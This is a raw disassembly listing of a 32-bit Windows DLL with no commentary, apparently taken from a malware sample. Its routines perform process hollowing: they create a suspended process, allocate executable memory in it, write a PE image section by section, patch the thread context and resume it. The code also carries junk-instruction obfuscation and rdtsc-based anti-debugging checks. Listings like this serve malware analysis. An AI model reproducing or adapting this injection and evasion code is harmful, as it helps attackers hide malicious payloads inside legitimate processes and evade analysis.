push eax
push 0
push 0
push 4
push 0
push 0
push 0
mov eax, [ebp+var_C]
call sub_100019D8
push eax
mov eax, [ebp+var_8]
call sub_100019D8
push eax
call ds:dword_100087FC
test eax, eax
jz loc_10002D0A
mov [ebp+var_2D], 1
xor eax, eax
push ebp
push offset loc_10002D03
push dword ptr fs:[eax]
mov fs:[eax], esp
pusha
add esi, 71h
sub eax, 49h
xor edi, ecx
inc edx
ror ecx, 3Bh
nop
dec ecx
inc ebx
rol edi, 43h
nop
add esi, 0AAh
popa
pusha
ror ebx, 0ADh
xor ebx, 65h
sub eax, 23h
nop
xor ebx, 1
mov edi, 0EAh
sub esi, 0D4h
nop
xor esi, eax
xor esi, 96h
mov edx, edi
add esi, 0DBh
nop
xor edx, 99h
popa
pusha
inc edi
sub edx, 0C6h
dec ecx
xor ebx, esi
rol ecx, 0C9h
dec eax
xor esi, eax
nop
xor edi, ecx
xor eax, 58h
dec esi
add edx, 57h
nop
dec ecx
dec eax
mov edx, 19h
mov ecx, esi
xor ecx, 0BBh
ror ebx, 78h
inc edi
sub edx, 25h
mov ebx, edx
xor ebx, esi
rol ecx, 0D1h
nop
mov eax, 63h
xor edi, 4Dh
ror esi, 5Ch
nop
xor edx, eax
sub esi, 24h
sub ecx, 39h
mov ebx, 22h
inc edi
nop
add edx, 78h
xor ecx, 36h
add eax, 4Bh
mov esi, 60h
popa
mov [ebp+var_15C], 10002h
lea eax, [ebp+var_15C]
push eax
mov eax, [ebp+var_48]
push eax
call ds:dword_10008800
test eax, eax
jz loc_10002CC6
lea eax, [ebp+var_18]
push eax
push 4
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_B8]
add eax, 8
push eax
mov eax, [ebp+var_4C]
push eax
call ds:dword_10008804
test eax, eax
jz loc_10002CC6
mov eax, [ebp+var_14]
push eax
mov eax, [ebp+var_4C]
push eax
call [ebp+var_34]
test eax, eax
jl loc_10002CC6
cmp [ebp+var_4], 0
jz loc_10002CC6
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
add eax, [ebp+var_4]
mov [ebp+var_28], eax
push 4
push 3000h
mov eax, [ebp+var_28]
mov eax, [eax+50h]
push eax
mov eax, [ebp+var_28]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_4C]
push eax
call ds:dword_10008814
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz loc_10002CC6
lea eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_28]
mov eax, [eax+54h]
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [ebp+var_14]
push eax
mov eax, [ebp+var_4C]
push eax
call ds:dword_10008808
test eax, eax
jz loc_10002CC6
mov eax, [ebp+var_28]
call sub_100028E8
mov [ebp+var_2C], eax
mov eax, [ebp+var_28]
movzx eax, word ptr [eax+6]
dec eax
test eax, eax
jb loc_10002C7B
inc eax
mov [ebp+var_3C], eax
mov [ebp+var_20], 0
loc_10002BF0: ; CODE XREF: sub_1000292C+349�j
lea eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_20]
lea eax, [eax+eax*4]
mov edx, [ebp+var_2C]
mov eax, [edx+eax*8+10h]
push eax
mov eax, [ebp+var_20]
lea eax, [eax+eax*4]
mov edx, [ebp+var_2C]
mov eax, [edx+eax*8+14h]
add eax, [ebp+var_4]
push eax
mov eax, [ebp+var_20]
lea eax, [eax+eax*4]
mov edx, [ebp+var_2C]
mov eax, [edx+eax*8+0Ch]
add eax, [ebp+var_14]
push eax
mov eax, [ebp+var_4C]
push eax
call ds:dword_10008808
test eax, eax
jz short loc_10002C6F
lea eax, [ebp+var_24]
push eax
mov eax, [ebp+var_20]
lea eax, [eax+eax*4]
mov edx, [ebp+var_2C]
mov eax, [edx+eax*8+24h]
call sub_1000290C
push eax
mov eax, [ebp+var_20]
lea eax, [eax+eax*4]
mov edx, [ebp+var_2C]
mov eax, [edx+eax*8+8]
push eax
mov eax, [ebp+var_20]
lea eax, [eax+eax*4]
mov edx, [ebp+var_2C]
mov eax, [edx+eax*8+0Ch]
add eax, [ebp+var_14]
push eax
mov eax, [ebp+var_4C]
push eax
call [ebp+var_38]
loc_10002C6F: ; CODE XREF: sub_1000292C+304�j
inc [ebp+var_20]
dec [ebp+var_3C]
jnz loc_10002BF0
loc_10002C7B: ; CODE XREF: sub_1000292C+2B3�j
lea eax, [ebp+var_1C]
push eax
push 4
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_B8]
add eax, 8
push eax
mov eax, [ebp+var_4C]
push eax
call ds:dword_10008808
test eax, eax
jz short loc_10002CC6
mov eax, [ebp+var_28]
mov eax, [eax+28h]
add eax, [ebp+var_14]
mov [ebp+var_AC], eax
lea eax, [ebp+var_15C]
push eax
mov eax, [ebp+var_48]
push eax
call ds:dword_1000880C
cmp eax, 1
sbb eax, eax
inc eax
mov [ebp+var_2D], al
loc_10002CC6: ; CODE XREF: sub_1000292C+1F8�j
; sub_1000292C+21E�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10002D0A
loc_10002CD3: ; CODE XREF: sub_1000292C+3DC�j
cmp [ebp+var_2D], 0
jnz short loc_10002CE7
push 0
mov eax, [ebp+var_4C]
push eax
call ds:dword_100087B4
jmp short loc_10002CFC
; ---------------------------------------------------------------------------
loc_10002CE7: ; CODE XREF: sub_1000292C+3AB�j
mov edx, [ebp+var_44]
mov eax, [ebp+var_8]
call sub_100027F8
mov eax, [ebp+var_48]
push eax
call ds:dword_10008810
loc_10002CFC: ; CODE XREF: sub_1000292C+3B9�j
mov al, [ebp+var_2D]
mov [ebp+var_D], al
retn
; ---------------------------------------------------------------------------
loc_10002D03: ; DATA XREF: sub_1000292C+11F�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10002CD3
; ---------------------------------------------------------------------------
loc_10002D0A: ; CODE XREF: sub_1000292C+112�j
; DATA XREF: sub_1000292C+3A2�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10002D3C
loc_10002D17: ; CODE XREF: sub_1000292C+40E�j
lea eax, [ebp+var_164]
mov edx, 2
call sub_100016FC
lea eax, [ebp+var_C]
mov edx, 2
call sub_100016FC
retn
; ---------------------------------------------------------------------------
loc_10002D35: ; DATA XREF: sub_1000292C+34�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10002D17
; ---------------------------------------------------------------------------
loc_10002D3C: ; CODE XREF: sub_1000292C+408�j
; DATA XREF: sub_1000292C+3E6�o
mov al, [ebp+var_D]
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_1000292C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 14h
dword_10002D50 dd 546C4F6Dh, 684D5D56h, 0D362556h, 25201725h, 24262133h
; DATA XREF: sub_1000292C+4A�o
dd 0
dd 0FFFFFFFFh, 10h
dword_10002D70 dd 4E4B5161h, 6E515D4Eh, 27352F4Dh, 3E003020h, 0
; DATA XREF: sub_1000292C+7A�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10002D84 proc near ; CODE XREF: sub_100031E0+1FB�p
; sub_100031E0+291�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor edx, edx
div [ebp+var_8]
test edx, edx
jnz short loc_10002DA4
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
jmp short loc_10002DB3
; ---------------------------------------------------------------------------
loc_10002DA4: ; CODE XREF: sub_10002D84+16�j
mov eax, [ebp+var_4]
xor edx, edx
div [ebp+var_8]
inc eax
imul [ebp+var_8]
mov [ebp+var_C], eax
loc_10002DB3: ; CODE XREF: sub_10002D84+1E�j
mov eax, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_10002D84 endp
; ---------------------------------------------------------------------------
align 4
loc_10002DBC: ; CODE XREF: sub_100031E0+43�p
push ebp
mov ebp, esp
add esp, 0FFFFFFE4h
mov [ebp-4], eax
mov eax, [ebp-4]
mov eax, [eax+3Ch]
add eax, [ebp-4]
mov [ebp-10h], eax
mov eax, [ebp-10h]
mov eax, [eax+38h]
mov [ebp-0Ch], eax
mov eax, [ebp-10h]
mov eax, [eax+54h]
xor edx, edx
div dword ptr [ebp-0Ch]
test edx, edx
jnz short loc_10002DF4
mov eax, [ebp-10h]
mov eax, [eax+54h]
mov [ebp-8], eax
jmp short loc_10002E06
; ---------------------------------------------------------------------------
loc_10002DF4: ; CODE XREF: CODE:10002DE7�j
mov eax, [ebp-10h]
mov eax, [eax+54h]
xor edx, edx
div dword ptr [ebp-0Ch]
inc eax
imul dword ptr [ebp-0Ch]
mov [ebp-8], eax
loc_10002E06: ; CODE XREF: CODE:10002DF2�j
jmp loc_10002E7F
; ---------------------------------------------------------------------------
and byte ptr [ecx+ebp*8-34CFD1A4h], 4
loc_10002E13: ; CODE XREF: CODE:10002EE8�j
xadd eax, eax
stc
jb near ptr loc_10002E1F+4
add [ecx], dl
loc_10002E1F: ; CODE XREF: CODE:10002E17�j
mov dword ptr [edi+310FD5FEh], 310FC88Bh
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10002E3A
jmp near ptr 5040EEEAh
; ---------------------------------------------------------------------------
loc_10002E3A: ; CODE XREF: CODE:10002E33�j
not eax
stc
jb loc_10002E90
add [edi+1], ah
dec esp
lds eax, [edx]
loc_10002E49: ; CODE XREF: CODE:10002EFA�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10002E60
jmp near ptr 0EC64BADFh
; ---------------------------------------------------------------------------
loc_10002E60: ; CODE XREF: CODE:10002E59�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
loc_10002E70: ; CODE XREF: CODE:loc_10002E70�j
jg short loc_10002E70
stc
jb loc_10002EB7
add [ecx+67h], dh
db 65h
fxch st(5)
loc_10002E7F: ; CODE XREF: CODE:loc_10002E06�j
push 0
pop eax
stc
stc
jb near ptr loc_10002EF0+4
add [eax-3CC7FFC8h], cl
loc_10002E90: ; CODE XREF: CODE:10002E3D�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10002EA7
jmp near ptr 0A1DC42F0h
; ---------------------------------------------------------------------------
loc_10002EA7: ; CODE XREF: CODE:10002EA0�j
not eax
stc
stc
jb loc_10002F06 ; CODE XREF: CODE:10002EB4�j
add [edx+26h], cl
loope near ptr loc_10002EAB+4
dec esi
loc_10002EB7: ; CODE XREF: CODE:10002E73�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10002ECE
jmp near ptr 9040EF7Eh
; ---------------------------------------------------------------------------
loc_10002ECE: ; CODE XREF: CODE:10002EC7�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10002EE5
jmp near ptr 0ACED2AF0h
; ---------------------------------------------------------------------------
loc_10002EE5: ; CODE XREF: CODE:10002EDE�j
not eax
stc
jb loc_10002E13
add al, ch
loc_10002EF0: ; CODE XREF: CODE:10002E84�j
fsub dword ptr [ebp+2EBBB12h]
bound ebp, [eax-7]
stc
jb loc_10002E49
add [ebx], ah
in eax, 5Ch
sbb dl, al
loc_10002F06: ; CODE XREF: CODE:loc_10002EAB�j
jmp loc_10002F8F
; ---------------------------------------------------------------------------
db 64h
dd 0FC5B72B6h
db 0Bh, 86h, 83h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10002F66
loc_10002F13: ; CODE XREF: sub_10002F66+1D�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10002F2A
jmp near ptr 0A1708403h
; ---------------------------------------------------------------------------
loc_10002F2A: ; CODE XREF: sub_10002F66-43�j
jmp short loc_10002F2E
; END OF FUNCTION CHUNK FOR sub_10002F66
; ---------------------------------------------------------------------------
db 0Dh, 0E4h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10002F66
loc_10002F2E: ; CODE XREF: sub_10002F66:loc_10002F2A�j
bt eax, eax
stc
stc
jb near ptr loc_10002FB8+4
add [ecx-79h], dl
pushf
inc eax
; END OF FUNCTION CHUNK FOR sub_10002F66
; ---------------------------------------------------------------------------
db 0C6h
; ---------------------------------------------------------------------------
loc_10002F3F: ; CODE XREF: CODE:10002FB0�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10002F56
jmp near ptr 4848A84Ch
; ---------------------------------------------------------------------------
loc_10002F56: ; CODE XREF: CODE:10002F4F�j
call near ptr sub_10002F66
inc edi
sub al, 40h
inc eax
; ---------------------------------------------------------------------------
db 0
dd 0
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_10002F66 proc far ; CODE XREF: CODE:loc_10002F56�p
; FUNCTION CHUNK AT 10002F13 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 10002F2E SIZE 00000010 BYTES
pop eax
jmp short loc_10002F6B
; ---------------------------------------------------------------------------
db 0EAh, 8
; ---------------------------------------------------------------------------
loc_10002F6B: ; CODE XREF: sub_10002F66+1�j
stc
jb near ptr loc_10003013+1
add ds:61D70B93h, ah
jmp short loc_10002F7E
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 0FCh
db 74h, 54h
; ---------------------------------------------------------------------------
loc_10002F7E: ; CODE XREF: sub_10002F66+12�j
push 0
pop eax
stc
stc
jb loc_10002F13
add [eax-60h], ah
retn 76DEh
sub_10002F66 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_10002F8F: ; CODE XREF: CODE:loc_10002F06�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10002FA6
jmp near ptr 10C07C55h
; ---------------------------------------------------------------------------
loc_10002FA6: ; CODE XREF: CODE:10002F9F�j
push 6822h
add esp, 4
stc
stc
jb loc_10002F3F
add [edx], ah
loc_10002FB8: ; CODE XREF: sub_10002F66-33�j
mov fs, word ptr [ebx+310F02A0h]
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10002FD3
jmp near ptr 0D0E91855h
; ---------------------------------------------------------------------------
loc_10002FD3: ; CODE XREF: CODE:10002FCC�j
call loc_10002FE3
xchg ebp, [eax+edi*4]
mov [eax+20E0A0D0h], bl
and [eax], al
loc_10002FE3: ; CODE XREF: CODE:loc_10002FD3�p
pop eax
xadd eax, eax
not eax
stc
jb loc_10002FF6
add [edi+66CF2131h], dh
loc_10002FF6: ; CODE XREF: CODE:10002FEA�j
jmp short loc_10003005
; ---------------------------------------------------------------------------
dd 24CC94A9h, 2 dup(0)
db 0
; ---------------------------------------------------------------------------
loc_10003005: ; CODE XREF: CODE:loc_10002FF6�j
not eax
stc
jb loc_10003042
add [ebp-1Dh], dl
in eax, 0E7h
loc_10003013: ; CODE XREF: sub_10002F66+6�j
ror byte ptr [edi], cl
xor [ebx+2B310FC8h], ecx
enter 0FFFFD1F7h, 81h
stc
; ---------------------------------------------------------------------------
dd 10000h, 6BE9057Ch, 0EB80C07Ch, 0D0F77401h, 8701EBF9h
dd 820FF9F9h, 0FFFFFF3Ch, 474AC600h
db 6Dh, 17h
; ---------------------------------------------------------------------------
loc_10003042: ; CODE XREF: CODE:10003008�j
jmp loc_10003122
; ---------------------------------------------------------------------------
db 15h
dd 235BF126h
db 0E5h, 0C3h, 0A0h
; ---------------------------------------------------------------------------
loc_1000304F: ; CODE XREF: CODE:100030DE�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10003066
jmp near ptr 98491533h
; ---------------------------------------------------------------------------
loc_10003066: ; CODE XREF: CODE:1000305F�j
push eax
push edx
rdtsc
xor ecx, eax
pop edx
xor ecx, eax
pop eax
push 9
pop eax
stc
stc
jb loc_100030EA
add [edx+6222E69Eh], dl
loc_10003081: ; CODE XREF: CODE:100030EF�j
not eax
stc
stc
jb near ptr loc_1000308D+4
add dh, dl
loc_1000308D: ; CODE XREF: CODE:10003085�j
mov edx, 0F7F14E4h
xor [ebx+2B310FC8h], ecx
enter 0FFFFD1F7h, 81h
stc
; ---------------------------------------------------------------------------
db 2 dup(0), 1
dd 0E9057C00h, 60E02068h, 0FF9D0F7h, 4A82h, 0F42C0000h
db 70h, 0DBh, 0ABh
; ---------------------------------------------------------------------------
loc_100030B7: ; CODE XREF: CODE:1000314A�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_100030CE
loc_100030C9: ; CODE XREF: CODE:100030F7�j
jmp near ptr 0E010E16Ah
; ---------------------------------------------------------------------------
loc_100030CE: ; CODE XREF: CODE:100030C7�j
push 3CDBh
add esp, 4
rol ebx, 5
ror ebx, 5
stc
stc
jb loc_1000304F ; CODE XREF: CODE:1000311F�j
add [esi-7B4E696h], ah
loc_100030EA: ; CODE XREF: CODE:10003075�j
not eax
not eax
stc
jb loc_10003081
add cl, ah
ja short loc_100030C9
push edx
or eax, 0C88B310Fh
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10003112
jmp loc_10003152
; ---------------------------------------------------------------------------
loc_10003112: ; CODE XREF: CODE:1000310B�j
push 0
pop eax
stc
jb loc_10003156
add [ebx-13h], bl
js short near ptr loc_100030DE+5
pop ecx
loc_10003122: ; CODE XREF: CODE:loc_10003042�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10003139
jmp near ptr 0F051298Fh
; ---------------------------------------------------------------------------
loc_10003139: ; CODE XREF: CODE:10003132�j
jmp short loc_10003148
; ---------------------------------------------------------------------------
db 84h
dd 0D0h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_10003148: ; CODE XREF: CODE:loc_10003139�j
stc
stc
jb loc_100030B7
add dh, bl
loc_10003152: ; CODE XREF: CODE:1000310D�j
jb short near ptr loc_100031BA+2
sbb al, 0AEh
loc_10003156: ; CODE XREF: CODE:10003116�j
mov eax, [ebp-10h]
add eax, 18h
mov edx, [ebp-10h]
movzx edx, word ptr [edx+14h]
add eax, edx
mov [ebp-14h], eax
mov eax, [ebp-10h]
movzx eax, word ptr [eax+6]
dec eax
test eax, eax
jb short loc_100031D8
inc eax
mov [ebp-1Ch], eax
mov dword ptr [ebp-18h], 0
loc_1000317F: ; CODE XREF: CODE:100031D6�j
mov eax, [ebp-18h]
lea eax, [eax+eax*4]
mov edx, [ebp-14h]
cmp dword ptr [edx+eax*8+8], 0
jz short loc_100031D0
mov eax, [ebp-18h]
lea eax, [eax+eax*4]
mov edx, [ebp-14h]
mov eax, [edx+eax*8+8]
xor edx, edx
div dword ptr [ebp-0Ch]
test edx, edx
jnz short loc_100031B7
mov eax, [ebp-18h]
lea eax, [eax+eax*4]
mov edx, [ebp-14h]
mov eax, [edx+eax*8+8]
add [ebp-8], eax
jmp short loc_100031D0
; ---------------------------------------------------------------------------
loc_100031B7: ; CODE XREF: CODE:100031A3�j
mov eax, [ebp-18h]
loc_100031BA: ; CODE XREF: CODE:loc_10003152�j
lea eax, [eax+eax*4]
mov edx, [ebp-14h]
mov eax, [edx+eax*8+8]
xor edx, edx
div dword ptr [ebp-0Ch]
inc eax
imul dword ptr [ebp-0Ch]
add [ebp-8], eax
loc_100031D0: ; CODE XREF: CODE:1000318D�j
; CODE:100031B5�j
inc dword ptr [ebp-18h]
dec dword ptr [ebp-1Ch]
jnz short loc_1000317F
loc_100031D8: ; CODE XREF: CODE:10003172�j
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100031E0 proc near ; CODE XREF: CODE:10006B16�p
; CODE:10006B4A�p
var_160 = dword ptr -160h
var_134 = dword ptr -134h
var_130 = word ptr -130h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_10C = dword ptr -10Ch
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_40 = dword ptr -40h
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 100014A8 SIZE 00000036 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFEA0h
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
call sub_100019C8
mov eax, [ebp+var_C]
call sub_100019C8
xor eax, eax
push ebp
push offset loc_1000366F
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_39], 0
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
add eax, [ebp+var_4]
mov [ebp+var_30], eax
mov eax, [ebp+var_4]
call loc_10002DBC
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
call sub_100010F0
mov [ebp+var_34], eax
xor eax, eax
push ebp
push offset loc_1000364D
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_34]
mov [ebp+var_2C], eax
mov eax, [ebp+var_30]
mov eax, [eax+54h]
mov [ebp+var_1C], eax
pusha
inc eax
inc edi
mov edx, 9Dh
xor esi, ebx
inc edi
nop
nop
nop
sub eax, 89h
ror esi, 9Eh
xor edx, 87h
ror edx, 6Bh
mov ecx, 0FDh
mov esi, eax
add esi, 41h
xor edx, edi
inc edx
nop
xor ecx, 49h
xor eax, edx
mov ecx, esi
xor edx, eax
rol esi, 9Ch
mov ecx, edi
xor edx, 64h
nop
popa
pusha
xor ebx, esi
mov edx, edi
nop
ror ebx, 7Fh
ror eax, 63h
mov edi, 0CAh
inc esi
sub ecx, 71h
mov ebx, edx
xor ecx, 65h
add eax, 0A5h
xor eax, 5Eh
sub esi, 47h
nop
mov esi, 2Bh
nop
add edx, 92h
rol ecx, 4Fh
nop
ror ebx, 0B6h
nop
nop
mov ebx, 43h
xor edi, 1
add esi, 0BEh
nop
nop
nop
sub eax, 0EEh
dec esi
sub ecx, 44h
nop
nop
xor ecx, 0D1h
xor ebx, 0BAh
ror edi, 0A4h
mov edx, 0B9h
rol ecx, 77h
nop
nop
xor ecx, 86h
inc eax
ror esi, 0DCh
popa
pusha
rol edi, 3Ah
nop
rol ebx, 0E7h
add ecx, 0C5h
dec ebx
nop
xor eax, 0E9h
add edi, 50h
dec esi
dec ebx
add edi, 69h
sub esi, 0A4h
ror ecx, 0B9h
xor ebx, 0FAh
sub eax, 8Ch
mov esi, 4Ah
xor edx, 8
add ecx, 0C6h
nop
nop
nop
mov ecx, 0D0h
xor ebx, 8Eh
add eax, 4Ch
nop
nop
inc edi
xor esi, ebx
nop
mov eax, edx
rol eax, 0FBh
nop
mov eax, ecx
inc eax
popa
mov eax, [ebp+var_30]
add eax, 18h
mov edx, [ebp+var_30]
movzx edx, word ptr [edx+14h]
add eax, edx
mov [ebp+var_38], eax
mov eax, [ebp+var_30]
movzx eax, word ptr [eax+6]
dec eax
test eax, eax
jb short loc_100033C1
inc eax
mov [ebp+var_40], eax
mov [ebp+var_24], 0
loc_10003397: ; CODE XREF: sub_100031E0+1DF�j
mov eax, [ebp+var_24]
lea eax, [eax+eax*4]
mov edx, [ebp+var_38]
mov eax, [edx+eax*8+14h]
cmp eax, [ebp+var_1C]
jnb short loc_100033B9
mov eax, [ebp+var_24]
lea eax, [eax+eax*4]
mov edx, [ebp+var_38]
mov eax, [edx+eax*8+14h]
mov [ebp+var_1C], eax
loc_100033B9: ; CODE XREF: sub_100031E0+1C7�j
inc [ebp+var_24]
dec [ebp+var_40]
jnz short loc_10003397
loc_100033C1: ; CODE XREF: sub_100031E0+1AA�j
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_4]
mov eax, [ebp+var_2C]
call sub_10001F9C
mov eax, [ebp+var_30]
mov edx, [eax+38h]
mov eax, [ebp+var_30]
mov eax, [eax+54h]
call sub_10002D84
add eax, [ebp+var_2C]
mov [ebp+var_2C], eax
mov eax, [ebp+var_30]
movzx eax, word ptr [eax+6]
dec eax
test eax, eax
jb loc_100034B8
inc eax
mov [ebp+var_40], eax
mov [ebp+var_24], 0
loc_10003401: ; CODE XREF: sub_100031E0+2D2�j
mov eax, [ebp+var_24]
lea eax, [eax+eax*4]
mov edx, [ebp+var_38]
cmp dword ptr [edx+eax*8+10h], 0
jbe short loc_1000347E
mov eax, [ebp+var_24]
lea eax, [eax+eax*4]
mov edx, [ebp+var_38]
mov eax, [edx+eax*8+10h]
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
lea eax, [eax+eax*4]
mov edx, [ebp+var_38]
mov eax, [edx+eax*8+8]
cmp eax, [ebp+var_28]
jnb short loc_10003443
mov eax, [ebp+var_24]
lea eax, [eax+eax*4]
mov edx, [ebp+var_38]
mov eax, [edx+eax*8+8]
mov [ebp+var_28], eax
loc_10003443: ; CODE XREF: sub_100031E0+251�j
mov eax, [ebp+var_24]
lea eax, [eax+eax*4]
mov edx, [ebp+var_38]
mov edx, [edx+eax*8+14h]
add edx, [ebp+var_4]
mov ecx, [ebp+var_28]
mov eax, [ebp+var_2C]
call sub_10001F9C
mov eax, [ebp+var_24]
lea eax, [eax+eax*4]
mov edx, [ebp+var_38]
mov eax, [edx+eax*8+8]
mov edx, [ebp+var_30]
mov edx, [edx+38h]
call sub_10002D84
add eax, [ebp+var_2C]
mov [ebp+var_2C], eax
jmp short loc_100034AC
; ---------------------------------------------------------------------------
loc_1000347E: ; CODE XREF: sub_100031E0+22F�j
mov eax, [ebp+var_24]
lea eax, [eax+eax*4]
mov edx, [ebp+var_38]
cmp dword ptr [edx+eax*8+8], 0
jz short loc_100034AC
mov eax, [ebp+var_24]
lea eax, [eax+eax*4]
mov edx, [ebp+var_38]
mov eax, [edx+eax*8+8]
mov edx, [ebp+var_30]
mov edx, [edx+38h]
call sub_10002D84
add eax, [ebp+var_2C]
mov [ebp+var_2C], eax
loc_100034AC: ; CODE XREF: sub_100031E0+29C�j
; sub_100031E0+2AC�j
inc [ebp+var_24]
dec [ebp+var_40]
jnz loc_10003401
loc_100034B8: ; CODE XREF: sub_100031E0+210�j
lea eax, [ebp+var_160]
mov edx, 44h
call sub_10001FA4
lea eax, [ebp+var_10C]
mov edx, 0CCh
call sub_10001FA4
cmp byte ptr [ebp+arg_0], 1
jnz short loc_100034FB
mov [ebp+var_160], 44h
mov [ebp+var_134], 1
mov [ebp+var_130], 0
loc_100034FB: ; CODE XREF: sub_100031E0+2FC�j
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_160]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
mov eax, [ebp+var_C]
call sub_100019D8
push eax
mov eax, [ebp+var_8]
call sub_100019D8
push eax
call ds:dword_100087FC
test eax, eax
jz short loc_10003535
mov [ebp+var_39], 1
loc_10003535: ; CODE XREF: sub_100031E0+34F�j
mov [ebp+var_10C], 10007h
lea eax, [ebp+var_10C]
push eax
mov eax, [ebp+var_118]
push eax
call ds:dword_10008800
lea eax, [ebp+var_18]
push eax
push 4
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_68]
add eax, 8
push eax
mov eax, [ebp+var_11C]
push eax
call ds:dword_10008804
push 40h
push 3000h
mov eax, [ebp+var_20]
push eax
mov eax, [ebp+var_30]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_11C]
push eax
call ds:dword_10008814
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+var_20]
push eax
mov eax, [ebp+var_34]
push eax
mov eax, [ebp+var_30]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_11C]
push eax
call ds:dword_10008808
lea eax, [ebp+var_18]
push eax
push 4
mov eax, [ebp+var_30]
add eax, 34h
push eax
mov eax, [ebp+var_68]
add eax, 8
push eax
mov eax, [ebp+var_11C]
push eax
call ds:dword_10008808
mov eax, [ebp+var_30]
mov eax, [eax+34h]
mov edx, [ebp+var_30]
add eax, [edx+28h]
mov [ebp+var_5C], eax
lea eax, [ebp+var_10C]
push eax
mov eax, [ebp+var_118]
push eax
call ds:dword_1000880C
cmp eax, 1
sbb eax, eax
inc eax
mov [ebp+var_39], al
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10003654
loc_1000360A: ; CODE XREF: sub_100031E0+472�j
mov eax, [ebp+var_34]
push eax
call sub_10001D44
pop ecx
cmp [ebp+var_39], 0
jnz short loc_1000362B
push 0
mov eax, [ebp+var_11C]
push eax
call ds:dword_100087B4
jmp short loc_10003646
; ---------------------------------------------------------------------------
loc_1000362B: ; CODE XREF: sub_100031E0+438�j
mov edx, [ebp+var_114]
mov eax, [ebp+var_8]
call sub_100027F8
mov eax, [ebp+var_118]
push eax
call ds:dword_10008810
loc_10003646: ; CODE XREF: sub_100031E0+449�j
mov al, [ebp+var_39]
mov [ebp+var_D], al
retn
; ---------------------------------------------------------------------------
loc_1000364D: ; DATA XREF: sub_100031E0+59�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_1000360A
; ---------------------------------------------------------------------------
